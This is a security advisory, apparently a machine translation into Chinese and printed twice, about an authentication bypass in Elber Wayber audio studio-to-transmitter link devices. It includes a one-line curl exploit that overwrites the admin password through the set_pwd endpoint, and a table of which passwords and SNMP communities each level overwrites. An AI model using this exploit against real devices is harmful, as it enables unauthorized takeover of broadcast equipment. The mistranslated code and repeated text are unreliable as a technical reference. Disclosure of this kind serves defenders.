Elber Wayber模拟/数字音频STL 4.00身份验证旁路
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本:版本3.0.0修订版1553(固件Ver。4.00Rev. 1501)
版本3.0.0修订版1542(固件Ver。4.00Rev. 1516)
版本3.0.0修订版1530(固件Ver。4.00Rev. 1516)
版本3.0.0修订版1530(固件Ver。4.00Rev. 1501)
版本3.0.0修订版1480(固件Ver。3.00Rev. 1350)
版本3.0.0修订版1480(固件Ver。3.00Rev. 1342)
版本1.0.0修订1202(固件VER。2.00Rev. 2131)
Summary: Wayber II是模拟/数字微波链接的名称
能够将单声道或MPX立体信号从工作室传输到音频
发射机。紧凑而可靠,它具有非常高质量的
信号处理和微波部分的现代技术领先
出色的表演。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass
wd},
53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5822
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5822.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本:版本3.0.0修订版1553(固件Ver。4.00Rev. 1501)
版本3.0.0修订版1542(固件Ver。4.00Rev. 1516)
版本3.0.0修订版1530(固件Ver。4.00Rev. 1516)
版本3.0.0修订版1530(固件Ver。4.00Rev. 1501)
版本3.0.0修订版1480(固件Ver。3.00Rev. 1350)
版本3.0.0修订版1480(固件Ver。3.00Rev. 1342)
版本1.0.0修订1202(固件VER。2.00Rev. 2131)
Summary: Wayber II是模拟/数字微波链接的名称
能够将单声道或MPX立体信号从工作室传输到音频
发射机。紧凑而可靠,它具有非常高质量的
信号处理和微波部分的现代技术领先
出色的表演。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass

53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5822
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5822.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)